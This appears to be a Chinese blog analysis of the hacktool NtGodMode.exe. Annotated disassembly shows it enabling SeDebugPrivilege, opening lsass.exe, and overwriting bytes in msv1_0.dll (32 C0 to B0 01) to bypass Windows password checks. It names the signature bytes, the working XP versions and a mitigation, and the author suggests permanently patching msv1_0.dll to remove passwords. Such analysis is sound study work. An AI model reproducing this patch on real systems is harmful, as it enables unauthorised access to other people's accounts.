分析NtGodMode.exe干了什么
发布时间:2016-12-26 来源:查字典编辑

byhttp://tmdnet.nothave.com

NtGodModex.exehttp://www.xfocus.net/tools/200804/1272.html

NtGodMode.exe 9.00KB(9,216字节),带UPX壳,直接用OllyDbg脱壳,过程略

NtGodMode~.exe 120KB(123,392字节),用PE工具查看,是Delphi写的

00403220>55PUSHEBP // entry of the main routine (Delphi-compiled); the author cuts this listing at 0040328F and resumes it at 004032C1

004032218BECMOVEBP,ESP

00403223B90D000000MOVECX,0D // 13 iterations of the push/push loop below: zero 0x68 bytes of stack for locals

004032286A00PUSH0

0040322A6A00PUSH0

0040322C49DECECX

0040322D^75F9JNZSHORTNtGodMod.00403228

0040322F51PUSHECX

0040323053PUSHEBX // save callee-saved registers

0040323156PUSHESI

0040323257PUSHEDI

00403233A19C404000MOVEAX,DWORDPTRDS:[40409C]

00403238C60001MOVBYTEPTRDS:[EAX],1 // sets a flag byte through a global pointer; its meaning is not visible in this excerpt

0040323BB8C0314000MOVEAX,NtGodMod.004031C0

00403240E813EEFFFFCALLNtGodMod.00402058 // author: gets a handle (base address) of the process itself

00403245BB60574000MOVEBX,NtGodMod.00405760 // EBX = address of the global scan pointer at 00405760, used by the signature loop at 004032FF

0040324A33C0XOREAX,EAX

0040324C55PUSHEBP

0040324D6880384000PUSHNtGodMod.00403880 // handler address for the exception frame installed below

0040325264:FF30PUSHDWORDPTRFS:[EAX] // FS:[0] is the SEH chain head: link a new exception frame (Delphi try/finally)

0040325564:8920MOVDWORDPTRFS:[EAX],ESP

00403258E81BF2FFFFCALLNtGodMod.00402478 // presumably returns the command-line argument count — TODO confirm

0040325D48DECEAX

0040325E7D61JGESHORTNtGodMod.004032C1 // author: -> 004032C1; taken when the result is >= 1 (an argument was supplied), otherwise fall through to the usage text

00403260E84FFEFFFFCALLNtGodMod.004030B4 // author (at 00403387): prints author info

004032656898384000PUSHNtGodMod.00403898;ASCII"Usage:"

0040326A8D55E4LEAEDX,DWORDPTRSS:[EBP-1C]

0040326D33C0XOREAX,EAX

0040326FE8F8F0FFFFCALLNtGodMod.0040236C // presumably loads the program name into the string local at [EBP-1C] — TODO confirm

004032748B45E4MOVEAX,DWORDPTRSS:[EBP-1C]

004032778D55E8LEAEDX,DWORDPTRSS:[EBP-18]

0040327AE811F4FFFFCALLNtGodMod.00402690

0040327FFF75E8PUSHDWORDPTRSS:[EBP-18]

0040328268A8384000PUSHNtGodMod.004038A8;ASCII"ON|OFF"

004032878D45ECLEAEAX,DWORDPTRSS:[EBP-14]

0040328ABA03000000MOVEDX,3

0040328FE870E9FFFFCALLNtGodMod.00401C04 // presumably concatenates the three pieces into the usage message in [EBP-14] — TODO confirm

///////////////////////////////////////////////////////////////////////////////////////////////////

004032C1A18C404000MOVEAX,DWORDPTRDS:[40408C] // continuation of the main routine (entry at 00403220): an argument was given

004032C6E861EAFFFFCALLNtGodMod.00401D2C // presumably converts the Delphi string to a C string for the API call — TODO confirm

004032CB50PUSHEAX//msv1_0.dll

004032CCE8BFEEFFFFCALL<JMP.&kernel32.LoadLibraryA>//LoadLibrary("msv1_0.dll")

004032D1A34C574000MOVDWORDPTRDS:[40574C],EAX // save the msv1_0.dll base address (in this process, not in LSASS) at [40574C]

004032D6833D4C5740000>CMPDWORDPTRDS:[40574C],0

004032DD0F8482050000JENtGodMod.00403865 // LoadLibrary failed: jump to the exit path

004032E333C0XOREAX,EAX

004032E5A350574000MOVDWORDPTRDS:[405750],EAX // [405750] = 0; it will receive the address of the matched bytes

004032EAA14C574000MOVEAX,DWORDPTRDS:[40574C]

004032EF8903MOVDWORDPTRDS:[EBX],EAX // scan pointer [00405760] = module base

004032F133C0XOREAX,EAX

004032F355PUSHEBP

004032F46850334000PUSHNtGodMod.00403350

004032F964:FF30PUSHDWORDPTRFS:[EAX] // second SEH frame (handler 00403350) around the scan loop

004032FC64:8920MOVDWORDPTRFS:[EAX],ESP

004032FF8B03MOVEAX,DWORDPTRDS:[EBX] // EAX = current scan pointer; author: msv1_0.dll base address (true only on the first pass, it is advanced at 00403322)

0040330180388BCMPBYTEPTRDS:[EAX],8B

00403304751CJNZSHORTNtGodMod.00403322

004033068B03MOVEAX,DWORDPTRDS:[EBX]

0040330840INCEAX

0040330980384DCMPBYTEPTRDS:[EAX],4D

0040330C7514JNZSHORTNtGodMod.00403322

0040330E8B03MOVEAX,DWORDPTRDS:[EBX]

0040331083C002ADDEAX,2

0040331380380CCMPBYTEPTRDS:[EAX],0C

00403316750AJNZSHORTNtGodMod.00403322

004033188B03MOVEAX,DWORDPTRDS:[EBX]

0040331A83C003ADDEAX,3

0040331D803849CMPBYTEPTRDS:[EAX],49 // author: search msv1_0.dll for the signature 8B 4D 0C 49 (mov ecx,[ebp+0C] / dec ecx)

004033207404JESHORTNtGodMod.00403326 // author: if found, continue scanning forward for 32 C0

00403322FF03INCDWORDPTRDS:[EBX] // no upper bound: if the signature is absent the scan runs past the module until a fault, which is what the SEH frame above would catch — TODO confirm handler behaviour

00403324^EBD9JMPSHORTNtGodMod.004032FF

004033268B03MOVEAX,DWORDPTRDS:[EBX]

00403328803832CMPBYTEPTRDS:[EAX],32

0040332B7511JNZSHORTNtGodMod.0040333E

0040332D8B03MOVEAX,DWORDPTRDS:[EBX]

0040332F40INCEAX

004033308038C0CMPBYTEPTRDS:[EAX],0C0 // looking for the first 32 C0 (xor al,al) after the signature

004033337509JNZSHORTNtGodMod.0040333E

004033358B03MOVEAX,DWORDPTRDS:[EBX]

00403337A350574000MOVDWORDPTRDS:[405750],EAX // save the address found in [405750]

0040333CEB04JMPSHORTNtGodMod.00403342

0040333EFF03INCDWORDPTRDS:[EBX] // advance the pointer by one byte (again unbounded)

00403340^EBE4JMPSHORTNtGodMod.00403326

0040334233C0XOREAX,EAX

004033445APOPEDX

0040334559POPECX

0040334659POPECX

0040334764:8910MOVDWORDPTRDS:[EAX],EDX // unlink the SEH frame (restore FS:[0])

0040334A6857334000PUSHNtGodMod.00403357

0040334FC3RETN // push/ret = jump to 00403357 (Delphi finally-block epilogue)

00403357A150574000MOVEAX,DWORDPTRDS:[405750]

0040335C2B054C574000SUBEAX,DWORDPTRDS:[40574C] // found address - msv1_0.dll base = offset of the patch site within the module

00403362A350574000MOVDWORDPTRDS:[405750],EAX // [405750] now holds the offset, not an address

00403367A14C574000MOVEAX,DWORDPTRDS:[40574C]

0040336C50PUSHEAX

0040336DE8E6EDFFFFCALL<JMP.&kernel32.FreeLibrary> // the local copy is only needed to compute the offset

00403372C6059C5840000>MOVBYTEPTRDS:[40589C],0

00403379C605915840000>MOVBYTEPTRDS:[405891],0 // three global flag bytes cleared; their meaning is not visible in this excerpt

00403380C6059D5840000>MOVBYTEPTRDS:[40589D],0

00403387E828FDFFFFCALLNtGodMod.004030B4 // author: prints author info

0040338C8D55DCLEAEDX,DWORDPTRSS:[EBP-24]

0040338FB802000000MOVEAX,2

00403394E8D3EFFFFFCALLNtGodMod.0040236C // presumably fetches argument 2 (the ON|OFF switch) into [EBP-24] — TODO confirm

.

.

.

/////////////////////////////////////////////////////////////////////////////////////////////

//提升自身权限:为自己的进程令牌启用SeDebugPrivilege(调试权限)

http://tmdnet.nothave.com/tmp/NtGodMode.txt

00402F1C53PUSHEBX;NtGodMod.00405760 // BOOL EnableDebugPrivilege(void): Delphi register-convention leaf; returns EAX = 1 on success, 0 otherwise

00402F1D83C4E8ADDESP,-18 // 0x18-byte frame: +0 hToken, +4 ReturnLength, +8 TOKEN_PRIVILEGES {PrivilegeCount, Luid(+C..+13), Attributes(+14)}

00402F2033DBXOREBX,EBX // EBX = result, defaults to failure

00402F2254PUSHESP // &hToken (frame+0)

00402F236A28PUSH28 // TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x08)

00402F25E83EF2FFFFCALL<JMP.&kernel32.GetCurrentProcess>

00402F2A50PUSHEAX

00402F2BE8F8F1FFFFCALL<JMP.&advapi32.OpenProcessToken> // OpenProcessToken(GetCurrentProcess(), 0x28, &hToken); return value is not checked

00402F308D44240CLEAEAX,DWORDPTRSS:[ESP+C] // &Luid (frame+C)

00402F3450PUSHEAX

00402F35687C2F4000PUSHNtGodMod.00402F7C;ASCII"SeDebugPrivilege"

00402F3A6A00PUSH0

00402F3CE8DFF1FFFFCALL<JMP.&advapi32.LookupPrivilegeValueA> // LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &Luid)

00402F4185C0TESTEAX,EAX

00402F437430JESHORTNtGodMod.00402F75 // lookup failed: return 0

00402F45C744240801000>MOVDWORDPTRSS:[ESP+8],1 // PrivilegeCount = 1

00402F4DC744241402000>MOVDWORDPTRSS:[ESP+14],2 // Attributes = SE_PRIVILEGE_ENABLED

00402F558D442404LEAEAX,DWORDPTRSS:[ESP+4] // &ReturnLength (frame+4)

00402F5950PUSHEAX

00402F5A6A00PUSH0 // PreviousState = NULL

00402F5C6A10PUSH10 // BufferLength = sizeof(TOKEN_PRIVILEGES) with one entry

00402F5E8D442414LEAEAX,DWORDPTRSS:[ESP+14] // &TOKEN_PRIVILEGES (frame+8, seen through the three pushes above)

00402F6250PUSHEAX

00402F636A00PUSH0 // DisableAllPrivileges = FALSE

00402F658B442414MOVEAX,DWORDPTRSS:[ESP+14] // hToken (frame+0, seen through the five pushes above)

00402F6950PUSHEAX

00402F6AE8A9F1FFFFCALL<JMP.&advapi32.AdjustTokenPrivileges>

00402F6F83F801CMPEAX,1 // CF = (EAX == 0)

00402F721BDBSBBEBX,EBX // EBX = -1 if the call returned 0, else 0

00402F7443INCEBX // EBX = (AdjustTokenPrivileges() != 0); GetLastError is never consulted, so ERROR_NOT_ALL_ASSIGNED (privilege not held by the account) still reports success

00402F758BC3MOVEAX,EBX

00402F7783C418ADDESP,18 // hToken is never closed (no CloseHandle in this function)

00402F7A5BPOPEBX

00402F7BC3RETN

///////////////////////////////////////////////////////////////////////////////////////////////

.

.//这段通过进程名获取LSASS.EXE的PID,太长,略...

.

///////////////////////////////////////////////////////////////////////////////////////////////

http://tmdnet.nothave.com/tmp/NtGodMode.txt

0040358A50PUSHEAX // excerpt from the middle of a routine whose start is elided above; EAX = PID of LSASS.EXE (from the elided lookup)

0040358B6A00PUSH0 // bInheritHandle = FALSE

0040358D68FF0F1F00PUSH1F0FFF // PROCESS_ALL_ACCESS (pre-Vista value)

00403592E801ECFFFFCALL<JMP.&kernel32.OpenProcess> // OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid): open the LSASS.EXE process

004035978BF0MOVESI,EAX // ESI = LSASS process handle for the rest of the routine

0040359985F6TESTESI,ESI

0040359B751EJNZSHORTNtGodMod.004035BB

0040359DA198404000MOVEAX,DWORDPTRDS:[404098]

004035A2BA10394000MOVEDX,NtGodMod.00403910;ASCII"Sorry.Ican'tDOmore." // OpenProcess failed (e.g. SeDebugPrivilege not actually granted): print and exit

004035A7E878E8FFFFCALLNtGodMod.00401E24

004035ACE86FE1FFFFCALLNtGodMod.00401720

004035B1E83EDCFFFFCALLNtGodMod.004011F4

004035B6E9AA020000JMPNtGodMod.00403865 // exit path

004035BBB8A0584000MOVEAX,NtGodMod.004058A0

004035C0BA00000100MOVEDX,10000

004035C5E80EECFFFFCALLNtGodMod.004021D8 // presumably zeroes the 0x10000-byte buffer at 004058A0 — TODO confirm

004035CA68A0584100PUSHNtGodMod.004158A0

004035CFBAA0584000MOVEDX,NtGodMod.004058A0

004035D4B900000100MOVECX,10000

004035D98BC6MOVEAX,ESI

004035DBE8A4F8FFFFCALLNtGodMod.00402E84 // presumably a module-enumeration wrapper (hProcess, buffer, size, &bytesNeeded at 004158A0) — TODO confirm

004035E08B3DA0584100MOVEDI,DWORDPTRDS:[4158A0]

004035E64FDECEDI

004035E785FFTESTEDI,EDI

004035E90F82D6000000JBNtGodMod.004036C5 // never taken: TEST clears CF, so an empty list is not caught here but by the CMP at 004035FF

004035EF47INCEDI

004035F0C705585740000>MOVDWORDPTRDS:[405758],0

004035FABBA0584000MOVEBX,NtGodMod.004058A0 // EBX walks the module-handle array

004035FF833B00CMPDWORDPTRDS:[EBX],0

004036020F84BD000000JENtGodMod.004036C5 // end of list

00403608C705A4584100C>MOVDWORDPTRDS:[4158A4],0C8 // name buffer length = 200

00403612A1A4584100MOVEAX,DWORDPTRDS:[4158A4]

0040361750PUSHEAX

00403618B9A8584100MOVECX,NtGodMod.004158A8 // name buffer

0040361D8B13MOVEDX,DWORDPTRDS:[EBX] // current module handle

0040361F8BC6MOVEAX,ESI

00403621E88EF8FFFFCALLNtGodMod.00402EB4 // presumably fetches the module's file name to compare against msv1_0.dll — TODO confirm; the rest of the loop is elided by the author

///////////////////////////////////////////////////////////////////////////////////////////////////

http://tmdnet.nothave.com/tmp/NtGodMode.txt

00403732685C574000PUSHNtGodMod.0040575C // excerpt (routine starts earlier, elided): ON branch. &OldProtect at 0040575C

004037376A40PUSH40 // PAGE_EXECUTE_READWRITE

004037396A02PUSH2 // size = 2 bytes

0040373BA150574000MOVEAX,DWORDPTRDS:[405750] // remote patch address; at 00403362 this slot held an offset, so it was presumably rebased onto msv1_0.dll inside LSASS in the elided code — TODO confirm

0040374050PUSHEAX

0040374156PUSHESI // ESI = LSASS process handle

00403742E879EAFFFFCALL<JMP.&kernel32.VirtualProtectEx> // VirtualProtectEx(hLsass, addr, 2, PAGE_EXECUTE_READWRITE, &old); result not checked

004037476898584000PUSHNtGodMod.00405898 // &BytesWritten

0040374C6A02PUSH2

0040374E6890404000PUSHNtGodMod.00404090 // source: the 2 replacement bytes

00403753A150574000MOVEAX,DWORDPTRDS:[405750]

0040375850PUSHEAX

0040375956PUSHESI

0040375AE869EAFFFFCALL<JMP.&kernel32.WriteProcessMemory> // author: patch 32 C0 (xor al,al) to B0 01 (mov al,1). VirtualProtectEx + WriteProcessMemory into lsass.exe is the observable sequence here; the result is not checked either

0040375FB004MOVAL,4

00403761E8DEEFFFFFCALLNtGodMod.00402744 // presumably console colour/attribute (AL=4) — TODO confirm

00403766A198404000MOVEAX,DWORDPTRDS:[404098]

0040376BBA70394000MOVEDX,NtGodMod.00403970;ASCII"OpenGodMode!" // printed unconditionally, even if the write above failed

00403770E8AFE6FFFFCALLNtGodMod.00401E24

00403775E8A6DFFFFFCALLNtGodMod.00401720

0040377AE875DAFFFFCALLNtGodMod.004011F4

0040377F33C0XOREAX,EAX

00403781E8BEEFFFFFCALLNtGodMod.00402744

00403786EB54JMPSHORTNtGodMod.004037DC

00403788685C574000PUSHNtGodMod.0040575C // OFF branch: identical call sequence with a different 2-byte source

0040378D6A40PUSH40

0040378F6A02PUSH2

00403791A150574000MOVEAX,DWORDPTRDS:[405750]

0040379650PUSHEAX

0040379756PUSHESI

00403798E823EAFFFFCALL<JMP.&kernel32.VirtualProtectEx>

0040379D6898584000PUSHNtGodMod.00405898

004037A26A02PUSH2

004037A46894404000PUSHNtGodMod.00404094 // source bytes at 00404094, presumably the original 32 C0 to restore — TODO confirm

004037A9A150574000MOVEAX,DWORDPTRDS:[405750]

004037AE50PUSHEAX

004037AF56PUSHESI

004037B0E813EAFFFFCALL<JMP.&kernel32.WriteProcessMemory>

004037B5B007MOVAL,7

004037B7E888EFFFFFCALLNtGodMod.00402744

004037BCA198404000MOVEAX,DWORDPTRDS:[404098]

004037C1BA88394000MOVEDX,NtGodMod.00403988;ASCII"CloseGodMode!"

004037C6E859E6FFFFCALLNtGodMod.00401E24

004037CBE850DFFFFFCALLNtGodMod.00401720

004037D0E81FDAFFFFCALLNtGodMod.004011F4

004037D533C0XOREAX,EAX

004037D7E868EFFFFFCALLNtGodMod.00402744

004037DC6A00PUSH0 // dwSize = 0

004037DE6A00PUSH0 // lpBaseAddress = NULL

004037E056PUSHESI

004037E1E86AE9FFFFCALL<JMP.&kernel32.FlushInstructionCache> // FlushInstructionCache(hLsass, NULL, 0) after both branches; the original page protection is never restored

小结

NtGodMode.exe的做法是:打开LSASS.EXE进程,在它加载的msv1_0.dll模块空间里搜索特征值8B4D0C49,再找其后的第1个32C0

这个32C0是汇编码xor al,al,把它修改为B001,对应汇编码mov al,1

为什么改成mov al,1以后就不用密码了?有兴趣的同学可以装个虚拟机,自己调一下LSASS.EXE

这个程序在我自己的机器(win2k sp4)上不起作用。我跟了一下,主要是上面搜索的那个特征值并不通用,结果改错了地方

在xp sp2、xp sp3上都起作用。

另外,想让自己的机器免疫这个东西其实也很简单:控制面板->管理工具->本地安全策略->本地策略->用户权利指派->调试程序,

里面有个admin用户,把它删除以后,这个程序就会失效——因为它提升自身权限的代码很老、很差、很弱小

其实这个东西要这样用,通过编程的方法,关掉系统的文件保护,直接改msv1_0.dll这个PE文件,这样机器不用密码了,然后要是很多机器的话访问共享文件也方便,计算机应该以人为本。

最后说一句delphi写的东西是不行,垃圾太多~!!

http://tmdnet.nothave.com/tmp/NtGodMode.txt
